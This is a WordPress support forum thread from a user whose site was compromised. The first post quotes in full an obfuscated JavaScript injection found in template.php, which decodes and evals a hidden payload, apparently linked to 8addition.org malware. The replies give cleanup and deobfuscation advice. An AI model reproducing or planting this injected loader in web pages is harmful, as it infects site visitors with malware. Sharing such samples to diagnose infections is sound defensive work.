Help...My Site was Hacked? (3 posts)

  1. Lilego
    Posted 6 years ago #

    Hi Guys

    I just started using wordpress and when I visited my site today, it said there was a syntax error loading wp-admin/includes/template.php on line 3275.

    I reloaded my site, and my virus scanner brought up this virus

    I checked the code on line 3275 and found that 3 lines were added to the original wordpress code. And at the end of </script> it shows <!-- myotherwebsite.com --> which is another website i have wordpress on!

    If you can help me figure out what's wrong that'd be great. Thanks guys

    <script language=JavaScript>function xb3b23(x) { var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,0,7,59,18,19,15,14,16,39,0,0,0,0,0,0,58,54,26,20,6,23,30,46,52,8,38,24,55,33,56,57,28,32,25,42,62,10,4,43,17,50,12,0,0,0,0,41,0,40,29,45,1,48,49,47,22,34,53,37,61,60,9,35,3,2,27,51,36,5,21,44,11,13,31);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(197^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}xb3b23('YY@SMSSwWrrwtDxwAigNdS@SQUG0MSS_eiUaWD3@YFxWfqB3i96WoFx_aqBOW4USQi0a94SmJhGcLBUT9LBwfh30SWF0tDBawDxWSG@@SFWaS2W@@xG3I4BwcGTcSq3SMA7itDrWWzx_WDSSaA73gz6ll50mw3GNoFU_YrSNGxTOkxxWMDrWNrzlAEFWQYSacDxTYzzOADxg_qUT92UWAhrStY30WS@SQFTTOW7WoFx_aq@Tis7')</script><!-- myotherwebsite.com -->

  2. jonnyd
    Posted 6 years ago #


    Did you get anywhere with this?
    I too am getting similar 8addition.org virus alerts.

    I will be upgrading to 2.7.1 does anyone know if this sorts the problem?

    Also what are the permissions on your files?



  3. trevornetley
    Posted 6 years ago #

    I'm not currently a WordPress user, but I can tell you that your web host has been intruded like many, many others. You should contact your hosting company. You need to remove the offending item from your source file and re-do everything.

    It happened to me (I'm with web-mania.com) and all my index.htm and home.htm files were infected, both with something very similar to the script you describe and with an extraneous <form> entry. I also had an infection in my cgi-bin directory which I had to remove manually. I was able to clear all the rest by uploading fresh copies of all infected files from my local backup, but that may not be much help to you?

    Note that you can submit the script to http://wepawet.iseclab.org/index.php and it will 'de-obfuscate' it for you - then you'll see where 8addition came from!

    Hope this helps

Topic Closed

This topic has been closed to new replies.

About this Topic